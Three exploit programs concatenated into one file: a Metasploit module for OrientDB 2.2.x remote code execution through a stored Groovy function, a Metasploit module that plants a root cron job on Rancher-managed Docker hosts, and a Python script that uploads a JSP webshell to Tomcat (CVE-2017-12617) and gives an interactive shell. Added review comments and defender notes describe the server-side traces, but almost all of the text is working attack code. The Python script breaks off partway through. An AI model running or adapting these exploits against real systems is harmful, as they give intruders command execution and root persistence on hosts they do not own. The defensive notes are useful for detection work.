##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # OrientDB 2.2.x remote code execution through a stored Groovy function.
  #
  # Sequence (see #exploit): authenticate with Basic auth (defaults writer /
  # writer), GRANT the hard-coded `writer` role extra rights on three system
  # classes via the SQL command endpoint, store an `ofunction` document whose
  # Groovy body is a Java Runtime.exec() wrapper (#java_craft_runtime_exec),
  # invoke it through /function/<db>/<name>, delete the document, then REVOKE
  # the grants.
  #
  # Defender notes, limited to what the requests below show:
  #   * the module depends on low-privileged Basic-auth credentials; the
  #     defaults are the well-known writer/writer pair;
  #   * GRANT/REVOKE on database.class.ouser, database.function and
  #     database.systemclusters issued TO writer, plus a short-lived groovy
  #     ofunction that is created, executed and deleted, are the server-side
  #     footprint to look for;
  #   * the Description gives 2.2.2 - 2.2.22 as affected and the referenced
  #     release-notes anchor names 2.2.23 — presumably the fixed release,
  #     confirm against the vendor notes.
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Module metadata plus user options: RPORT (2480), Basic-auth USERNAME and
  # PASSWORD (both default to 'writer') and TARGETURI (application base path).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'OrientDB 2.2.x Remote Code Execution',
      'Description' => %q{
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
},
      'Author' =>
        [
          'Francis Alexander - Beyond Security\'s SecuriTeam Secure Disclosure program', # Public PoC
          'Ricardo Jorge Borges de Almeida ricardojba1[at]gmail.com', # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['URL', 'https://blogs.securiteam.com/index.php/archives/3318'],
          ['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'],
          ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017']
        ],
      'Platform' => %w{ linux unix win },
      'Privileged' => false,
      'Targets' =>
        [
          # Linux uses #linux_stager, Unix CMD sends the command payload
          # directly, Windows goes through the CmdStager (see #exploit).
          ['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
          ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
          ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['vbs','certutil']}]
        ],
      'DisclosureDate' => 'Jul 13 2017',
      'DefaultTarget' => 0))
    register_options(
      [
        Opt::RPORT(2480),
        OptString.new('USERNAME', [ true, 'HTTP Basic Auth User', 'writer' ]),
        OptString.new('PASSWORD', [ true, 'HTTP Basic Auth Password', 'writer' ]),
        OptString.new('TARGETURI', [ true, 'The path to the OrientDB application', '/' ])
      ])
  end

  # Version probe: unauthenticated GET <TARGETURI>listDatabases, then match the
  # Server header. Any "OrientDB Server v.2.2." banner is reported Vulnerable,
  # everything else Safe — the exact patch level is not inspected.
  #
  # NOTE(review): when there is no response at all, `res` is nil and the
  # print_status in the else branch raises NoMethodError instead of returning
  # Exploit::CheckCode::Unknown.
  def check
    uri = target_uri
    uri.path = normalize_uri(uri.path)
    res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
    if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\./
      print_good("Version: #{res.headers['Server']}")
      return Exploit::CheckCode::Vulnerable
    else
      print_status("Version: #{res.headers['Server']}")
      return Exploit::CheckCode::Safe
    end
  end

  # Run one OS command on the server through a throw-away Groovy function.
  #
  # cmd  - the OS command string (base64-embedded by #java_craft_runtime_exec).
  # opts - despite the name and the `{}` default this is interpolated as the
  #        database name in every URI; both callers pass a database name.
  #
  # Four requests: (1) POST a new `ofunction` document, (2) POST to
  # /function/<db>/<name> to execute it, (3) read the new document's "@rid"
  # from the step-1 response, (4) DELETE the document. Requires @uri to have
  # been set by the caller (#execute_command / #exploit).
  #
  # NOTE(review): the error branches only call fail_with when the body is NOT
  # valid JSON — a well-formed JSON error response falls through silently. The
  # branches in steps 2 and 4 also re-parse `res` (the step-1 response) rather
  # than `req` / `rer`, and each `return` after fail_with is unreachable
  # because fail_with raises.
  def http_send_command(cmd, opts = {})
    # 1 -Create the malicious function
    func_name = Rex::Text::rand_text_alpha(5).downcase
    request_parameters = {
      'method' => 'POST',
      'uri' => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
      # The "code" field carries the Groovy source; "@rid" "#-1:-1" asks the
      # server to assign a new record id, which step 3 reads back.
      'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
    }
    res = send_request_raw(request_parameters)
    if not (res and res.code == 201)
      begin
        json_body = JSON.parse(res.body)
      rescue JSON::ParserError
        fail_with(Failure::Unknown, 'Failed to create the malicious function.')
        return
      end
    end
    # 2 - Trigger the malicious function
    request_parameters = {
      'method' => 'POST',
      'uri' => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
      'data' => ""
    }
    req = send_request_raw(request_parameters)
    if not (req and req.code == 200)
      begin
        json_body = JSON.parse(res.body)
      rescue JSON::ParserError
        fail_with(Failure::Unknown, 'Failed to trigger the malicious function.')
        return
      end
    end
    # 3 - Get the malicious function id
    if res && res.body.length > 0
      begin
        json_body = JSON.parse(res.body)["@rid"]
      rescue JSON::ParserError
        fail_with(Failure::Unknown, 'Failed to obtain the malicious function id for deletion.')
        return
      end
    end
    # Drop the first character (the '#' prefix of an OrientDB RID, cf. the
    # "@rid" value sent in step 1) to get the id used in the DELETE path.
    func_id = json_body.slice(1..-1)
    # 4 - Delete the malicious function
    request_parameters = {
      'method' => 'DELETE',
      'uri' => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => { 'Accept' => '*/*' },
      'data' => ""
    }
    rer = send_request_raw(request_parameters)
    if not (rer and rer.code == 204)
      begin
        json_body = JSON.parse(res.body)
      rescue JSON::ParserError
        fail_with(Failure::Unknown, 'Failed to delete the malicious function.')
        return
      end
    end
  end

  # Build the Groovy/Java source stored in the ofunction document.
  #
  # cmd - OS command; it is base64-encoded into the source and decoded at
  #       runtime with sun.misc.BASE64Decoder.
  # Returns a String: three randomly named locals, a String[3] argv of
  # `cmd.exe /c <cmd>` for the Windows target or `/bin/sh -c <cmd>` for the
  # others, handed to Runtime.getRuntime().exec(). Each "\n" is a real
  # newline, so the generated source is multi-line.
  def java_craft_runtime_exec(cmd)
    decoder = Rex::Text.rand_text_alpha(5, 8)
    decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
    cmd_array = Rex::Text.rand_text_alpha(5, 8)
    jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
    jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
    jcode << "String [] #{cmd_array} = new String[3];\n"
    if target['Platform'] == 'win'
      jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
      jcode << "#{cmd_array}[1] = \"/c\";\n"
    else
      jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
      jcode << "#{cmd_array}[1] = \"-c\";\n"
    end
    jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
    jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
    jcode
  end

  # Session hook: once a session is up, remove the dropped ELF recorded in
  # @to_delete (set by #linux_stager) with another command round trip.
  # No-op for the other targets, where @to_delete stays nil.
  def on_new_session(client)
    if not @to_delete.nil?
      print_warning("Deleting #{@to_delete} payload file")
      execute_command("rm #{@to_delete}")
    end
  end

  # CmdStager callback, also called directly by #linux_stager and
  # #on_new_session. Refreshes @uri, lists the databases via
  # GET <TARGETURI>listDatabases, picks the first one and hands `cmd` to
  # #http_send_command. `opts` is accepted for the CmdStager interface but
  # unused. Prints an error and returns nil when the listing fails or is not
  # JSON.
  def execute_command(cmd, opts = {})
    vprint_status("Attempting to execute: #{cmd}")
    @uri = target_uri
    @uri.path = normalize_uri(@uri.path)
    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
    if res && res.code == 200 && res.body.length > 0
      begin
        json_body = JSON.parse(res.body)["databases"]
      rescue JSON::ParserError
        print_error("Unable to parse JSON")
        return
      end
    else
      print_error("Timeout or unexpected response...")
      return
    end
    targetdb = json_body[0]
    http_send_command(cmd,targetdb)
  end

  # Linux target: write an x86 ELF of the payload into /tmp and run it.
  # The ELF is base64-encoded, every '=' replaced by the six literal
  # characters \u003d (the JSON escape for '='), and appended to
  # /tmp/<file>.b64 with `echo ... | tee` one line per #execute_command round
  # trip; it is then decoded, made executable and started. The binary's path
  # is kept in @to_delete for #on_new_session.
  def linux_stager
    cmds = "echo LINE | tee FILE"
    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(4+rand(4))
    execute_command("touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
    base64.each_line do |line|
      line.chomp!
      cmd = cmds
      cmd.gsub!(/LINE/, line)
      execute_command(cmds)
    end
    execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("chmod +x /tmp/#{file}")
    execute_command("rm /tmp/#{file}.b64")
    execute_command("/tmp/#{file}")
    @to_delete = "/tmp/#{file}"
  end

  # Entry point.
  # 1. GET listDatabases and take the first database name as the target DB.
  # 2. GRANT create/read/update/execute/delete ON database.class.ouser,
  #    database.function and database.systemclusters TO writer — one SQL
  #    command POST per (privilege, item) pair. The grantee is the hard-coded
  #    `writer` role, independent of USERNAME; responses are not checked.
  # 3. Deliver the payload per target platform (CmdStager for win, the raw
  #    command payload for unix, #linux_stager for linux) and start the
  #    handler.
  # 4. REVOKE the same grants FROM writer, again without checking responses
  #    and regardless of whether step 3 succeeded.
  def exploit
    @uri = target_uri
    @uri.path = normalize_uri(@uri.path)
    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
    if res && res.code == 200 && res.body.length > 0
      begin
        json_body = JSON.parse(res.body)["databases"]
      rescue JSON::ParserError
        print_error("Unable to parse JSON")
        return
      end
    else
      print_error("Timeout or unexpected response...")
      return
    end
    targetdb = json_body[0]
    privs_enable = ['create','read','update','execute','delete']
    items = ['database.class.ouser','database.function','database.systemclusters']
    # Set the required DB permissions
    privs_enable.each do |priv|
      items.each do |item|
        request_parameters = {
          'method' => 'POST',
          'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
          'vars_get' => { 'format' => 'rid,type,version,class,graph' },
          'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
          'headers' => { 'Accept' => '*/*' },
          'data' => "GRANT #{priv} ON #{item} TO writer"
        }
        res = send_request_raw(request_parameters)
      end
    end
    # Exploit
    case target['Platform']
    when 'win'
      print_status("#{rhost}:#{rport} - Sending command stager...")
      execute_cmdstager(flavor: :vbs)
    when 'unix'
      print_status("#{rhost}:#{rport} - Sending payload...")
      res = http_send_command("#{payload.encoded}","#{targetdb}")
    when 'linux'
      print_status("#{rhost}:#{rport} - Sending Linux stager...")
      linux_stager
    end
    handler
    # Final Cleanup
    privs_enable.each do |priv|
      items.each do |item|
        request_parameters = {
          'method' => 'POST',
          'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
          'vars_get' => { 'format' => 'rid,type,version,class,graph' },
          'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
          'headers' => { 'Accept' => '*/*' },
          'data' => "REVOKE #{priv} ON #{item} FROM writer"
        }
        res = send_request_raw(request_parameters)
      end
    end
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Rancher Server: abuse the container-creation API to run as root on a host.
  #
  # With valid API keys the module creates a container on TARGETHOST whose
  # dataVolumes bind-mounts the host's "/" under a random /mnt/<rand> path
  # (#make_container). The container's `sh -c` command (#make_cmd) writes the
  # payload ELF to /tmp/<rand> on the host and appends a `* * * * * root`
  # entry to /etc/cron.d/<rand>, so the host's cron runs the payload as root.
  #
  # Defender notes grounded in the requests below: (a) the module needs
  # working Rancher API credentials (#check returns Detected on 401), so
  # API-key scope and exposure are the control point; (b) a container request
  # carrying "dataVolumes": ["/:<path>"] and a new file under /etc/cron.d/ on
  # the host are the observable artefacts; (c) the only reference is Docker's
  # own daemon-attack-surface documentation.
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  # Module metadata and options. TARGETENV / TARGETHOST are Rancher ids,
  # DOCKERIMAGE must resolve on the host (or hub.docker.com), CONTAINER_ID
  # optionally fixes the container name, HttpUsername / HttpPassword carry the
  # API access/secret key pair. Advanced: TARGETURI (/v1/projects) and
  # WAIT_TIMEOUT (seconds to poll for the container to stop).
  #
  # NOTE(review): `'References' => [ 'URL' => ... ]` builds an Array holding a
  # single Hash rather than the `['URL', url]` pair form used elsewhere in
  # this file.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Rancher Server - Docker Exploit',
      'Description' => %q(
Utilizing Rancher Server, an attacker can create a docker container
with the '/' path mounted with read/write permissions on the host
server that is running the docker container. As the docker container
executes command as uid 0 it is honored by the host operating system
allowing the attacker to edit/create files owed by root. This exploit
abuses this to creates a cron job in the '/etc/cron.d/' path of the
host server.
The Docker image should exist on the target system or be a valid image
from hub.docker.com.
Use `check` with verbose mode to get a list of exploitable Rancher
Hosts managed by the target system.
),
      'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
      'License' => MSF_LICENSE,
      'References' => [
        'URL' => 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'
      ],
      'Platform' => 'linux',
      'Arch' => [ARCH_X64],
      'Payload' => { 'Space' => 65000 },
      'Targets' => [[ 'Linux', {} ]],
      'DefaultOptions' => { 'WfsDelay' => 75, 'Payload' => 'linux/x64/meterpreter/reverse_tcp' },
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jul 27, 2017'))
    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETENV', [ true, 'Target Rancher Environment', '1a5' ]),
        OptString.new('TARGETHOST', [ true, 'Target Rancher Host', '1h1' ]),
        OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]),
        OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
        OptString.new('HttpUsername', [false, 'Rancher API Access Key (Username)']),
        OptString.new('HttpPassword', [false, 'Rancher API Secret Key (Password)'])
      ]
    )
    register_advanced_options(
      [
        OptString.new('TARGETURI', [ true, 'Rancher API Path', '/v1/projects' ]),
        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
      ]
    )
  end

  # DELETE <TARGETURI>/<TARGETENV>/containers/<rancher_container_id>.
  #
  # rancher_container_id - the "id" Rancher returned when the container was
  #                        created.
  # container_id         - the human-chosen name, used only in the warning.
  # Prints a verbose success line on HTTP 200, otherwise warns that the
  # container must be removed by hand. The return value is the print_* result
  # and is not used by callers.
  def del_container(rancher_container_id, container_id)
    res = send_request_cgi(
      'method' => 'DELETE',
      'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', rancher_container_id),
      'ctype' => 'application/json',
      'headers' => { 'Accept' => 'application/json' }
    )
    return vprint_good('The docker container has been removed.') if res && res.code == 200
    print_warning("Manual cleanup of container \"#{container_id}\" is needed on the target.")
  end

  # Container name: the CONTAINER_ID option when set, else 8 random lowercase
  # letters.
  def make_container_id
    return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
    rand_text_alpha_lower(8)
  end

  # Compose the shell command run inside the container (via `sh -c`).
  #
  # mnt_path     - where the host's "/" is mounted inside the container.
  # cron_path    - host path of the cron.d file to create.
  # payload_path - host path of the payload binary to drop.
  # All writes go through mnt_path + <host path>; the cron line itself uses the
  # bare host path because cron runs on the host. The payload is embedded
  # base64 in the command line (hence the 65000-byte 'Space' cap). In a Ruby
  # double-quoted string `\&\&` is just `&&`. Returns the command String.
  def make_cmd(mnt_path, cron_path, payload_path)
    vprint_status('Creating the docker container command')
    echo_cron_path = mnt_path + cron_path
    echo_payload_path = mnt_path + payload_path
    command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& "
    command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& "
    command << "echo \"\" >> #{echo_cron_path} \&\& "
    command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}"
    command
  end

  # Body for POST .../containers, returned as a Hash (caller calls to_json).
  # The key line is 'dataVolumes' => ['/:' + mnt_path]: the host root is
  # bind-mounted into the container with no read-only flag, which is what
  # lets the `sh -c` command write host files.
  def make_container(mnt_path, cron_path, payload_path, container_id)
    vprint_status('Setting container json request variables')
    {
      'instanceTriggeredStop' => 'stop',
      'startOnCreate' => true,
      'networkMode' => 'managed',
      'requestedHostId' => datastore['TARGETHOST'],
      'type' => 'container',
      'dataVolumes' => [ '/:' + mnt_path ],
      'imageUuid' => 'docker:' + datastore['DOCKERIMAGE'],
      'name' => container_id,
      'command' => make_cmd(mnt_path, cron_path, payload_path),
      'entryPoint' => %w[sh -c]
    }
  end

  # GET <TARGETURI>; identify Rancher by the X-Rancher-Version header, then
  # walk environments -> hosts and (in verbose mode) print each pair, marking
  # the one selected by TARGETENV/TARGETHOST.
  #
  # Returns Unknown (no response), Detected (401 with the header, or 200 with
  # no hosts), Vulnerable (the selected env/host pair exists), Appears (hosts
  # exist but not the selected pair), Safe (anything else).
  #
  # NOTE(review): the header test serialises the whole header Hash to JSON and
  # looks for the substring 'X-Rancher-Version'; a 200 whose body is not JSON
  # raises an uncaught JSON::ParserError. `res` is reused for the per-env
  # request inside the loop.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'ctype' => 'application/json',
      'headers' => { 'Accept' => 'application/json' }
    )
    if res.nil?
      print_error('Failed to connect to the target')
      return Exploit::CheckCode::Unknown
    end
    if res.code == 401 && res.headers.to_json.include?('X-Rancher-Version')
      print_error('Authorization is required. Provide valid Rancher API Keys.')
      return Exploit::CheckCode::Detected
    end
    if res.code == 200 && res.headers.to_json.include?('X-Rancher-Version')
      target_found = false
      target_selected = false
      environments = JSON.parse(res.body)['data']
      environments.each do |e|
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, e['id'], 'hosts'),
          'ctype' => 'application/json',
          'headers' => { 'Accept' => 'application/json' }
        )
        hosts = JSON.parse(res.body)['data']
        hosts.each do |h|
          target_found = true
          result = "Rancher Host \"#{h['hostname']}\" (TARGETHOST #{h['id']}) on "
          result << "Environment \"#{e['name']}\" (TARGETENV #{e['id']}) found"
          # flag results when this host is targeted via options
          if datastore['TARGETENV'] == e['id'] && datastore['TARGETHOST'] == h['id']
            target_selected = true
            vprint_good(result + ' %red<-- targeted%clr')
          else
            vprint_good(result)
          end
        end
      end
      if target_found
        return Exploit::CheckCode::Vulnerable if target_selected
        print_bad("Your TARGETENV \"#{datastore['TARGETENV']}\" or/and TARGETHOST \"#{datastore['TARGETHOST']}\" is not available")
        if datastore['VERBOSE'] == false
          print_bad('Try verbose mode to know what happened.')
        end
        vprint_bad('Choose a TARGETHOST and TARGETENV from the results above')
        return Exploit::CheckCode::Appears
      else
        print_bad('No TARGETHOST available')
        return Exploit::CheckCode::Detected
      end
    end
    Exploit::CheckCode::Safe
  end

  # Entry point: run #check, create the container, poll until Rancher reports
  # it 'stopped' (the command has finished), delete it, then wait for cron.
  #
  # NOTE(review): the fail_with message 'Failed to connect to the target' is
  # printed for every non-Vulnerable #check result, including Detected
  # (missing API keys) and Appears (wrong TARGETENV/TARGETHOST), where #check
  # has already printed the real reason.
  def exploit
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::Unknown, 'Failed to connect to the target')
    end
    # create required information to create json container information
    cron_path = '/etc/cron.d/' + rand_text_alpha(8)
    payload_path = '/tmp/' + rand_text_alpha(8)
    mnt_path = '/mnt/' + rand_text_alpha(8)
    container_id = make_container_id
    # deploy docker container
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers'),
      'ctype' => 'application/json',
      'headers' => { 'Accept' => 'application/json' },
      'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
    )
    fail_with(Failure::Unknown, 'Failed to create the docker container') unless res && res.code == 201
    print_good('The docker container is created, waiting for it to deploy')
    # cleanup
    # Both are host paths (cron file and payload); FileDropper removes them
    # through the session once one is established.
    register_files_for_cleanup(cron_path, payload_path)
    rancher_container_id = JSON.parse(res.body)['id']
    deleted_container = false
    sleep_time = 5
    wait_time = datastore['WAIT_TIMEOUT']
    vprint_status("Waiting up to #{wait_time} seconds until the docker container stops")
    # Poll GET .../containers?name=<id> every 5 s; `next` still consumes
    # wait_time, so the loop is bounded by WAIT_TIMEOUT.
    while wait_time > 0
      sleep(sleep_time)
      wait_time -= sleep_time
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, datastore['TARGETENV'], 'containers', '?name=' + container_id),
        'ctype' => 'application/json',
        'headers' => { 'Accept' => 'application/json' }
      )
      next unless res && res.code == 200 && res.body.include?('stopped')
      vprint_good('The docker container has stopped, now trying to remove it')
      del_container(rancher_container_id, container_id)
      deleted_container = true
      wait_time = 0
    end
    # if container does not deploy, try to remove it and fail out
    unless deleted_container
      del_container(rancher_container_id, container_id)
      fail_with(Failure::Unknown, "The docker container failed to start")
    end
    print_status('Waiting for the cron job to run, can take up to 60 seconds')
  end
end
#!/usr/bin/python
import requests
import re
import signal
from optparse import OptionParser
class bcolors:
    """ANSI SGR escape sequences used to colour the script's terminal output.

    ``\\x1b`` is the same ESC byte as the octal ``\\033`` spelling.
    """
    HEADER = '\x1b[95m'     # bright magenta
    OKBLUE = '\x1b[94m'     # bright blue
    OKGREEN = '\x1b[92m'    # bright green
    WARNING = '\x1b[93m'    # bright yellow
    FAIL = '\x1b[91m'       # bright red
    ENDC = '\x1b[0m'        # reset all attributes
    BOLD = '\x1b[1m'
    UNDERLINE = '\x1b[4m'
# ASCII-art banner printed (wrapped in bcolors.OKGREEN/ENDC) at the start of
# each mode below; the OptionParser usage text repeats the same art inline.
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
    """SIGINT handler: print a red "[-] Exiting" line and terminate.

    Both arguments are ignored; note that the first parameter shadows the
    ``signal`` module inside this function.
    """
    print("\033[91m\n[-] Exiting\033[0m")
    exit()
# Install the Ctrl-C handler defined above so an interrupted run prints the
# exit message and terminates instead of dumping a KeyboardInterrupt trace.
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
    """Replace every HTML tag in ``tags`` with a newline, then collapse each
    run of exactly three newlines into one.

    The tag pattern is non-greedy and has no DOTALL flag, so a tag split
    across lines is left untouched.
    """
    untagged = re.sub(r'<.*?>', '\n', tags)
    return untagged.replace('\n\n\n', '\n')
def getContent(url,f):
    """GET ``<url>/<f>`` with a fixed browser User-Agent and return the raw
    response body (``requests`` ``.content``, i.e. bytes)."""
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    target = "/".join([str(url), str(f)])
    response = requests.get(target, headers=headers)
    return response.content
def createPayload(url,f):
    """Vulnerability probe: HTTP PUT a one-line JSP marker page to ``<url><f>/``.

    Only a 201 Created response is reported; any other status is silent.
    Note the trailing "/" on the request path, which getContent() does not
    append when reading the page back.
    """
    evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
    if req.status_code==201:
        print ("File Created ..")
def RCE(url,f):
    """Upload the JSP command page ``f`` via HTTP PUT (same trailing-"/" path
    form as createPayload()).

    The HTML form's ACTION is the page's own name; the response status is
    not checked, ``req`` is assigned and discarded, and nothing is returned.
    """
    EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
def shell(url,f):
    """Interactive loop: read a line, GET ``<url>/<f>?cmd=<line>`` and print
    the tag-stripped response body.

    Entering "q" or "Q" ends the loop. The local ``re`` shadows the ``re``
    module inside this function (removetags() is unaffected, it has its own
    scope).
    """
    while True:
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
        cmd=input("$ ")
        payload={'cmd':cmd}
        if cmd=="q" or cmd=="Q":
            break
        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
        re=str(re.content)
        t=removetags(re)
        print (t)
#print bcolors.HEADER+ banner+bcolors.ENDC
# Command-line front end. Exactly one of three modes is selected by which
# options are present; any other combination falls through all branches and
# the script exits silently.
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
    # No options at all: show usage and stop.
    print(parse.usage)
    exit(0)
else:
    if opt.U!=None and opt.P==None and opt.L==None:
        # Mode 1 (-u only): single-host check. PUT the marker page, read it
        # back and look for the marker string in the bytes body.
        print (bcolors.OKGREEN+banner+bcolors.ENDC)
        url=str(opt.U)
        checker="Poc.jsp"
        print (bcolors.BOLD +"Poc Filename {}".format(checker))
        createPayload(str(url)+"/",checker)
        con=getContent(str(url)+"/",checker)
        if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
            print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
            print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
        else:
            print ('Not Vulnerable to CVE-2017-12617 ')
    elif opt.P!=None and opt.U!=None and opt.L==None:
        # Mode 2 (-u and -p): upload <P>.jsp via RCE() and enter the
        # interactive shell() loop against it.
        print (bcolors.OKGREEN+banner+bcolors.ENDC)
        pwn=str(opt.P)
        url=str(opt.U)
        print ("Uploading Webshell .....")
        pwn=pwn+".jsp"
        RCE(str(url)+"/",pwn)
        shell(str(url),pwn)
    elif opt.L!=None and opt.P==None and opt.U==None:
        # Mode 3 (-l only): repeat the single-host check for every line of
        # the hosts file. The file handle is never closed.
        print (bcolors.OKGREEN+banner+bcolors.ENDC)
        w=str(opt.L)
